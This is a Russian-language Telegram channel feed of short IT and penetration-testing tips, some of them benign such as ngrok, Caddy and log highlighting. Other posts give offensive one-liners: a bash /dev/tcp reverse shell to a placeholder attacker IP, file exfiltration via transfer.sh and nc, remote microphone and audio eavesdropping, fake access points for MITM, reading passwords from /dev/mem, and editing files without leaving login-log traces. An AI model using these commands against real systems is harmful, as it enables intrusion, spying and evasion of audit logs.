Hacks & Perks
174 subscribers
2 files
33 links
This channel is intended to provide and share experience related with IT/IT Security
加入频道
Что делать, если вы за NAT или ещё чего, а порт нужно выставить наружу, при этом -R на SSH некуда сделать?

Есть несколько решений для этого:

1) https://ngrok.com/
2) https://localtunnel.github.io/www/

Юзал оба, выручали не раз.

#perks #remote #portforwarding
Если кому-то нужно ограничить коннект для приложения под Linux, то есть замечательная программа http://douaneapp.com/. Она позволяет разрешать/запрещать доступ в сеть отдельным процессам.

#perks #firewall #gtk
Пост для админов и тех кто держит свой небольшой проект/прод:

Есть такой веб-сервер https://caddyserver.com/

* По дефолту есть авто-SSL (via Letsencrypt), который сам ставится и продлевается. Главное иметь свой домен.

* Отдаёт автоматом markdown в виде html. (Ура, можно выкинуть jekyll)

* Веб-сервер — это всего лишь 1(!) бинарник без зависимостей (welcome to Golang)

* Вебсокеты из коробки

* IPv6 (всё работает, проверено)

* fastcgi через сокеты (поддержка uwcgi, php, unicorn, etc)

* + Reverse proxy, custom headers, rewrites & 301, vhosts и так далее.

#perks #web #alternginx #caddy
Часто так бывает, что нужно быстро расшарить (угнать) файл через cli.

Для таких случаев есть сервис https://transfer.sh/

Главное, чтобы у вас был curl в системе или любой другой клиент с возможностью отослать post запрос

Пишете в терминале:

curl --upload-file <LOCAL_FILE> https://transfer.sh/<ANY_NAME>

и ваш файл будет доступен для скачивания извне. Это очень удобный сервис, более того его можно захостить у себя (как я сделал для себя)

#perks #curl #upload #exfiltration
Когда находишься за натом и нужно быстро узнать внешний айпишник через curl

curl http://ifconfig.co

Страна:
curl http://ifconfig.co/country

Город:
curl http://ifconfig.co/city

Либо через wget -qO- , если curl недоступен

(c) @offsec
#ifconfig #curl #cli #hacks
Пост для хаке^Wпентестеров:

иногда бывает, что нужно загрузить файл вне сессии метерпретера и есть только nc-backconnect. В таком случае очень выручит BITS

bitsadmin /transfer sample /download /priority normal <URL> <path_to_save>

#hacks #wget #windows
⭐️ Данный метод должен знать каждый уважающий себя безопасник.

Когда на серваке нет nc и залить ничего нельзя, а очень нужен бэкконнект, то на помощь приходит подсистема /dev:

bash -i >& /dev/tcp/<hacker-ip>/<port> 0>&1

(c) @offsec

#backconnect #pentest #hacks
Раз дело зашло о /dev, то вот вам порция шпионажа. Отправить звук с удалённого компа на свои колонки

dd of=/dev/dsp | ssh -c arcfour -C username@host dd if=/dev/dsp


Тоже самое можно сделать и с микрофоном.

#hacks #espionage #linux
Если есть необходимость отдать файл по порту:
nc -v -l -p <PORT> < file

либо поднять мобильный веб-сервак:
python -m SimpleHTTPServer <PORT>

#hacks #web #exfiltration
Когда сидишь на Linux и надо законнектиться через psexec на Windows, чтобы получить права system, а Windows под рукой нет, то для таких случаев в линуксе есть аналог:

winexe --user=[DOMAIN/]USERNAME --system cmd

(c) @offsec

#psexec #alter #admin #hacks #pentest
Альтернативный метод для поста выше:

net rpc <command> -I <Win_PC_IP> -U username%password

#hacks #psexec #alter #admin #pentest
Когда из-под Linux нужно вытащить инфу из реестра с машины на Windows, например хостнейм:

#!/bin/bash
host="$1"
login_pass=\\Administrator%\<password>
rpc_cmd="net rpc registry enumerate"
reg_cname="HKLM\\SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ActiveComputerName"
reg_autorun="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
cname=$rpc_cmd $reg_cname -I $host -U $login_pass | grep -A 2 ComputerName | tail -1 | sed -r 's/^[^"]+//' | sed -r 's/\"//g'
echo HOSTNAME = "$cname"

От себя добавлю, что таким способом можно прописать свой прокси сервер на машине-жертве, тем самым слушать трафик.

(c) @offsec

#bash #registry #hacks
Когда нужно создать словарь для брутфорса на основе какого-либо сайта:

cewl -m 4 -w ./dict.txt http://victim.com

(c) @offsec

#dictionary #bruteforce #hacks
Когда сделал бэкконнект через веб-шелл на свой сервер и хочется интерактивного шелла:

python -c 'import pty; pty.spawn("/bin/sh")'

и можно развлекаться по полной :)

(c) @offsec

#tty #webshell #python #backconnect #hacks
Когда нужно быстро развернуть фейковую точку доступа, но на руках только андроид телефон (даже чужой):

1. Идём в настройки Android
2. Создаём свою точку доступа
3. Идём в настройки APN и прописываем прокси сервер (IP, port)
4. На своём VPS разворачиваем прокси-сервер, например Bettercap
5. Профит! Имея любой андроид телефон можно за минуту развернуть свою точку доступа, где открытый трафик будет бегать через твой сервер

(C) @offsec

#mitm #proxy #pentest #hacks
Иногда proxychains не справляется с приложением и не может перенаправить трафик через сокс-прокси.
Для таких случаев (и не только) есть утилита tun2socks, которая создает виртуальное сетевое устройство TUN.
Решает все проблемы капризных приложений. Уровень абстракции на сетевом уровне ниже только tcp.

./badvpn-tun2socks --tundev mytun --netif-ipaddr 10.0.0.1 --netif-netmask 255.0.0.0 --socks-server-addr 127.0.0.1:12345

И конечно же надо добавить роуты.

#hacks #proxy #socks #tunnel
Если необходимо провести аудит монотонных логов, то стоит их подсветить:

tail -f -n 100 /var/log/auth.log | ccze

ccze — это лишь опция. Есть также grc/colortail/multitail/lolcat.

#perks #highlight #logs #highlighting
Иногда бывает ряд факторов, которые мешают установить reverse shell. Преграды бывают разные. Это и брэндмауер, и IPS/IDS, и другие сложности.

Если всяческие попытки тщетны, а shell на Windows машину установить надо (можно адаптировать клиент и на *nix системы), то есть такая утилита под названием icmpsh.

Запускаете мастер ноду у себя на Linux системе. И следом стартуете клиент на машине-цели.


https://github.com/commonexploits/icmpsh

#hacks #icmp #reverse #shell
Бывает так, что вам нужно считать пароль либо любую другую текстовую информацию с RAM на хосте.

В таких случаях здорово выручит:

sudo dd if=/dev/mem | cat | strings

#perks #hacks #ram #volatility
В ситуациях, когда нужно подправить конфиг удалённо, на помощь приходит vim + scp:

vim scp://user@host:port//path/to/file

hint: файлы редактируется без записи в utmp/wtmp/btmp ^_^

#perks #hacks #vim #scp
Добрый день, подписчики.

Закончил чтение поперёк книги "Site Reliablitiy Engineering - How Google runs production systems"

В ней описываются методики и метрики, как организовывать HA на своих production сервисах.

tl;dr к прочтению всем devops/архитекторам, кто как-либо работает, либо планирует работать с отказоустойчивыми системами.

Книга доступна по ссылке снизу.

https://landing.google.com/sre/book.html

#perks #highavailability #google